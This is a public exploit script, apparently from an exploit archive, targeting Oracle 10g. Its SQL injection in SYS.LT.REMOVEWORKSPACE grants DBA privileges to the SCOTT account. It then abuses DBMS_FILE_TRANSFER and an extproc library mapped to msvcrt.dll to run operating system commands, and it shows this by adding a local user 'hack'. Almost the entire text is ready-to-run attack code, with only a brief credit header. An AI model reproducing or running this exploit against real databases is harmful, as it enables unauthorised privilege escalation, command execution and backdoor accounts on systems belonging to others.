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Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit
======================================================= Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit ======================================================= /*********************************************************/ /*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/ /****grant DBA and create new OS user (advanced extproc)*/ /*********************************************************/ /***********exploit grant DBA to scott********************/ /***********and execute OS command "net user"*************/ /***********using advanced extproc method*****************/ /*********************************************************/ /***********tested on oracle*******************/ /*********************************************************/ /*********************************************************/ /* Date of Public EXPLOIT: January 6, 2009 */ /* Written by: Alexandr "Sh2kerr" Polyakov */ /* email: Alexandr.Polyakov@dsec.ru */ /* site: http://www.dsecrg.ru */ /* http://www.dsec.ru */ /*********************************************************/ /*Original Advisory: */ /*Esteban Martinez Fayo [Team SHATTER ] */ /*Date of Public Advisory: November 11, 2008 */ /*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ /*********************************************************/ select * from user_role_privs; CREATE OR REPLACE FUNCTION X return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE ANY DIRECTORY TO SCOTT'; EXECUTE IMMEDIATE 'GRANT CREATE ANY LIBRARY TO SCOTT'; EXECUTE IMMEDIATE 'GRANT EXECUTE ON SYS.DBMS_FILE_TRANSFER TO SCOTT'; COMMIT; RETURN 'X'; END; / exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); exec SYS.LT.REMOVEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); /* bypassing extproc limitation by copying msvcrt.dll to $ORACLE_HOME\BIN */ /* this method works in 10g and 11g database versions with updates */ CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:\Windows\system32'; CREATE OR REPLACE DIRECTORY copy_dll_to AS 'C:\Oracle\product\10.1.0\db_1\BIN'; BEGIN SYS.DBMS_FILE_TRANSFER.COPY_FILE( source_directory_object => 'copy_dll_from', source_file_name => 'msvcrt.dll', destination_directory_object => 'copy_dll_to', destination_file_name => 'msvcrt.dll'); END; / CREATE OR REPLACE LIBRARY extproc_shell AS 'C:\Oracle\product\10.1.0\db_1\bin\msvcrt.dll'; / CREATE OR REPLACE PROCEDURE extprocexec (cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY extproc_shell LANGUAGE C; / /* here we can paste any OS command for example create new user */ EXEC extprocexec('net user hack 12345 /add'); / select * from user_role_privs; # 0day.today [2024-12-26] #